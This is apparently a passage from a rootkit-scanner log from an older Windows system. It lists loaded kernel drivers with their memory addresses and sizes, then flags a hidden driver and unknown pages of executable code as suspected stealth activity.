C:\WINDOWS\System32\Drivers\TDTCP.SYS Address: 0xBA4A8000 Size: 24576 bytes Driver: C:\WINDOWS\system32\DRIVERS\usbuhci.sys Address: 0xBA400000 Size: 24576 bytes Driver: C:\WINDOWS\System32\drivers\vga.sys Address: 0xBA458000 Size: 24576 bytes Driver: C:\WINDOWS\System32\Drivers\Msfs.SYS Address: 0xBA460000 Size: 20480 bytes Driver: PartMgr.sys Address: 0xBA330000 Size: 20480 bytes Driver: C:\WINDOWS\system32\DRIVERS\ptilink.sys Address: 0xBA418000 Size: 20480 bytes Driver: C:\WINDOWS\system32\DRIVERS\raspti.sys Address: 0xBA420000 Size: 20480 bytes Driver: C:\WINDOWS\system32\DRIVERS\TDI.SYS Address: 0xBA410000 Size: 20480 bytes Driver: C:\WINDOWS\System32\watchdog.sys Address: 0xBA388000 Size: 20480 bytes Driver: C:\WINDOWS\system32\DRIVERS\kbdhid.sys Address: 0xA779C000 Size: 16384 bytes Driver: C:\WINDOWS\system32\DRIVERS\mssmbios.sys Address: 0xB9D3B000 Size: 16384 bytes Driver: C:\WINDOWS\system32\DRIVERS\ndisuio.sys Address: 0xA75E5000 Size: 16384 bytes Driver: C:\WINDOWS\system32\DRIVERS\serenum.sys Address: 0xBA588000 Size: 16384 bytes Driver: C:\WINDOWS\system32\BOOTVID.dll Address: 0xBA4B8000 Size: 12288 bytes Driver: C:\WINDOWS\System32\drivers\Dxapi.sys Address: 0xA7794000 Size: 12288 bytes Driver: C:\WINDOWS\system32\DRIVERS\hidusb.sys Address: 0xB8236000 Size: 12288 bytes Driver: C:\WINDOWS\System32\Drivers\i2omgmt.SYS Address: 0xB8FB0000 Size: 12288 bytes Driver: C:\WINDOWS\system32\DRIVERS\mouhid.sys Address: 0xB822E000 Size: 12288 bytes Driver: C:\WINDOWS\system32\DRIVERS\ndistapi.sys Address: 0xBA58C000 Size: 12288 bytes Driver: C:\WINDOWS\system32\DRIVERS\rasacd.sys Address: 0xB8FA8000 Size: 12288 bytes Driver: 00000018 Address: 0xBA5A8000 Size: 8192 bytes Driver: C:\WINDOWS\System32\Drivers\Beep.SYS Address: 0xBA5DA000 Size: 8192 bytes Driver: dmload.sys Address: 0xBA5AE000 Size: 8192 bytes Driver: C:\WINDOWS\System32\Drivers\dump_WMILIB.SYS Address: 0xBA642000 Size: 8192 bytes Driver: C:\WINDOWS\System32\Drivers\Fs_Rec.SYS Address: 0xBA5D8000 
Size: 8192 bytes Driver: intelide.sys Address: 0xBA5AC000 Size: 8192 bytes Driver: C:\WINDOWS\system32\KDCOM.DLL Address: 0xBA5A8000 Size: 8192 bytes Driver: C:\WINDOWS\System32\Drivers\mnmdd.SYS Address: 0xBA5DC000 Size: 8192 bytes Driver: C:\Program Files\LogMeIn\x86\RaInfo.sys Address: 0xBA66E000 Size: 8192 bytes Driver: C:\WINDOWS\System32\DRIVERS\RDPCDD.sys Address: 0xBA5DE000 Size: 8192 bytes Driver: C:\WINDOWS\system32\DRIVERS\swenum.sys Address: 0xBA5D2000 Size: 8192 bytes Driver: C:\WINDOWS\system32\DRIVERS\USBD.SYS Address: 0xBA5D4000 Size: 8192 bytes Driver: C:\WINDOWS\system32\DRIVERS\WMILIB.SYS Address: 0xBA5AA000 Size: 8192 bytes Driver: C:\WINDOWS\system32\DRIVERS\audstub.sys Address: 0xBA79F000 Size: 4096 bytes Driver: C:\WINDOWS\System32\drivers\dxgthk.sys Address: 0xBA707000 Size: 4096 bytes Driver: C:\WINDOWS\system32\DRIVERS\lmimirr.sys Address: 0xBA79E000 Size: 4096 bytes Driver: C:\WINDOWS\System32\Drivers\Null.SYS Address: 0xBA776000 Size: 4096 bytes Driver: pciide.sys Address: 0xBA670000 Size: 4096 bytes !!!!!!!!!!!Hidden driver: 00000056 Loaded from: Address: 0x8AA18053 Size: 4013 bytes ============================================== >Stealth Unknown page with executable code Address: 0x8AA1A58F Size: 2673 Unknown page with executable code Address: 0x8AA18053 Size: 4013